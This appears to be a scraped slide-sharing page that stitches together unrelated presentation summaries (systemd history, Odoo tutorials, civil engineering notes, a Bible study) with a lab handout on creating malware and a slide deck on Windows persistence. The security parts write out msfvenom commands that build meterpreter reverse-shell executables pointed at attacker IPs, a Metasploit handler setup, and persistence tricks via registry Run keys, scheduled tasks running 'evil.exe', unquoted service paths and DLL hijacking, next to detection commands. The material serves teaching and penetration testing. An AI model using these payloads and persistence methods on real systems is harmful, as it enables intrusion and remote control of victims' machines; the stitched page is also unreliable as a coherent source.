A journey through the years of UNIX and Linux service managementLubomir Rintel
This document provides a history of Unix and Linux service management from the early days of /etc/init through the development of systemd. It describes the issues with early init systems like limitations in flexibility, lack of monitoring, and inconsistencies. It then discusses how various operating systems attempted to address these problems through tools like SMF, launchd, upstart, and others. Finally, it provides an overview of how systemd comprehensively solves the issues through features like unit files, control groups, journald logging, and integration with the Linux kernel.
This document lists over 80 processes and services running on the system as well as registry entries and browser extensions installed. It provides a detailed summary of the system's running software and configuration.
This document provides an overview of several Windows command line tools including RUNAS, WMIC, and PSTools. It describes how each tool can be used to gather system information, manage processes and services, and make configuration changes remotely. Specific examples are given for using WMIC and PSTools to inventory software, view events logs, kill processes, and reboot systems remotely. The document emphasizes that these tools can provide valuable insights but also stresses the importance of monitoring changes made.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
AMS Node Meetup December presentation Phusion Passengericemobile
Phusion Passenger is an app server for Node.js, Ruby and Python. It simplifies deployment and administration, increases your server's efficiency and helps identifying and solving problems.
In this talk Hongli Lai demonstrates how Passenger simplifies things by integrating with Nginx and by replacing Forever, PM2, Cluster and all sorts of other tools. Hongli also shares what other benefits Passenger has to offer, and what you can expect from future developments.
This document discusses compromising Windows XP systems and remedying vulnerabilities. It begins by explaining terminology and the methodology for deploying attacks, which involves probing targets, finding vulnerabilities, passing exploit information, targeting victims, and loading exploits and payloads. The document then demonstrates attacking a system with the IP address 192.168.1.9 using Metasploit and creating a reverse TCP connection after finding an MS08_067 vulnerability. It also discusses automating attacks using Bash and Python scripts to run Metasploit exploits. Finally, it recommends preventing attacks by scanning for vulnerabilities with Nessus and adopting suggested solutions.
This document summarizes various command line tricks and tools for managing ESXi hosts, including Linux commands like find, grep, cat, and vi, as well as VMware-specific commands like esxtop, vmkfstools, vim-cmd, esxcli, esxupdate, and vm-support. It is divided into four parts that cover understanding the ESXi command line, Linux commands, VMware commands, and using the vMA and scripting. The document provides examples for using these commands to locate files, read logs, control services, get process and disk information, configure networking and storage, manage VMs, troubleshoot issues, and install updates.
How to Make a Field Mandatory in Odoo 17Celine George
In Odoo, making a field required can be done through both Python code and XML views. When you set the required attribute to True in Python code, it makes the field required across all views where it's used. Conversely, when you set the required attribute in XML views, it makes the field required only in the context of that particular view.
Chapter wise All Notes of First year Basic Civil Engineering.pptxDenish Jangid
Chapter wise All Notes of First year Basic Civil Engineering
Syllabus
Chapter-1
Introduction to objective, scope and outcome the subject
Chapter 2
Introduction: Scope and Specialization of Civil Engineering, Role of civil Engineer in Society, Impact of infrastructural development on economy of country.
Chapter 3
Surveying: Object Principles & Types of Surveying; Site Plans, Plans & Maps; Scales & Unit of different Measurements.
Linear Measurements: Instruments used. Linear Measurement by Tape, Ranging out Survey Lines and overcoming Obstructions; Measurements on sloping ground; Tape corrections, conventional symbols. Angular Measurements: Instruments used; Introduction to Compass Surveying, Bearings and Longitude & Latitude of a Line, Introduction to total station.
Levelling: Instrument used Object of levelling, Methods of levelling in brief, and Contour maps.
Chapter 4
Buildings: Selection of site for Buildings, Layout of Building Plan, Types of buildings, Plinth area, carpet area, floor space index, Introduction to building byelaws, concept of sun light & ventilation. Components of Buildings & their functions, Basic concept of R.C.C., Introduction to types of foundation
Chapter 5
Transportation: Introduction to Transportation Engineering; Traffic and Road Safety: Types and Characteristics of Various Modes of Transportation; Various Road Traffic Signs, Causes of Accidents and Road Safety Measures.
Chapter 6
Environmental Engineering: Environmental Pollution, Environmental Acts and Regulations, Functional Concepts of Ecology, Basics of Species, Biodiversity, Ecosystem, Hydrological Cycle; Chemical Cycles: Carbon, Nitrogen & Phosphorus; Energy Flow in Ecosystems.
Water Pollution: Water Quality standards, Introduction to Treatment & Disposal of Waste Water. Reuse and Saving of Water, Rain Water Harvesting. Solid Waste Management: Classification of Solid Waste, Collection, Transportation and Disposal of Solid. Recycling of Solid Waste: Energy Recovery, Sanitary Landfill, On-Site Sanitation. Air & Noise Pollution: Primary and Secondary air pollutants, Harmful effects of Air Pollution, Control of Air Pollution. . Noise Pollution Harmful Effects of noise pollution, control of noise pollution, Global warming & Climate Change, Ozone depletion, Greenhouse effect
Text Books:
1. Palancharmy, Basic Civil Engineering, McGraw Hill publishers.
2. Satheesh Gopi, Basic Civil Engineering, Pearson Publishers.
3. Ketki Rangwala Dalal, Essentials of Civil Engineering, Charotar Publishing House.
4. BCP, Surveying volume 1
How to Setup Warehouse & Location in Odoo 17 InventoryCeline George
In this slide, we'll explore how to set up warehouses and locations in Odoo 17 Inventory. This will help us manage our stock effectively, track inventory levels, and streamline warehouse operations.
A Visual Guide to 1 Samuel | A Tale of Two HeartsSteve Thomason
These slides walk through the story of 1 Samuel. Samuel is the last judge of Israel. The people reject God and want a king. Saul is anointed as the first king, but he is not a good king. David, the shepherd boy is anointed and Saul is envious of him. David shows honor while Saul continues to self destruct.
2. WARNING
The materials of the lecture are presented only for
EDUCATIONAL PURPOSES.
The speaker is not responsible for the use of this
information for illegal purposes
3. root@kali:~# msfvenom -a x86 --platform Windows -p
windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f
exe -o evill.exe
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.2 //(your ip)
msf > set LPORT 4444 //(your port)
msf > exploit
Creating payload
4. Typical Attack. V1
Hm.
smth go
wrong
I want to
reboot
system
Destination host unreachable
run exploit
cmd shell>_
Connection Lost
5. Attack. V2
Hm.
smth go
wrong
I want to
reboot
system
run exploit
cmd shell>_
HKLMSoftwareMicrosoftWindowsCurrentVersionRun
Connection Lost
System is starting
cmd shell>_
6. So, what is persistence?
What kind of persistence do
you know?
Is it really a huge problem?
7. Persistence causes programs to run each time that a
user logs on or system starts. Usually in background.
“Hackers use persistence, not zero days to breach
companies”
8. Registry autoruns
Run/RunOnce Keys
● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion Run
● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion RunOnce
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion RunOnce
● HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPolicies
Keys used by WinLogon Process
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion Winlogon
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon Shell
Startup Keys
● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer User Shell
Folders
● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer Shell Folders
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer Shell Folders
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer User
…
13. Autorun. How to detect?
Link: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
This utility, which has the most
comprehensive knowledge of auto-starting
locations of any startup monitor, shows you
what programs are configured to run during
system bootup or login.
19. Unquoted service path
C:PROGRAM FILESSUB DIRPROGRAM NAME
C:PROGRAM*FILESSUB*DIRPROGRAM*NAME
● c:program.exe filessub dirprogram name
● c:program filessub.exe dirprogram name
● c:program filessub dirprogram.exe name
20. Unquoted service path. How to detect?
cmd>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows" |findstr /i /v """
22. Schedule tasks V1 (at). How?
cmd> at 08:00
/EVERY:m,t,w,th,f,s,su
"C:...evil.exe"
(ALWAYS SYSTEM priv)
C:Windowssystem32> at /?
The AT command schedules commands and
programs to run on a computer at
a specified time and date. The
Schedule service must be running to
use
the AT command.
AT [computername] [ [id] [/DELETE] |
/DELETE [/YES]]
AT [computername] time
[/INTERACTIVE]
[ /EVERY:date[,...] |
/NEXT:date[,...]] "command"
24. Schedule tasks. How to detect?
cmd> schtasks /query /FO CSV
/v > schtasks.csv
25. DLL hijacking and PATH magic
Dynamic-link library (or DLL) is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating
systems.
With both implicit and explicit linking, Windows first searches for "known DLLs", such as Kernel32.dll and User32.dll. Windows then
searches for the DLLs in the following sequence:
1. The directory where the executable module for the current process is located.
2. The current directory.
3. The Windows system directory. The GetSystemDirectory function retrieves the path of this directory.
4. The Windows directory. The GetWindowsDirectory function retrieves the path of this directory.
5. The directories listed in the PATH environment variable.
...Do you know your PATH?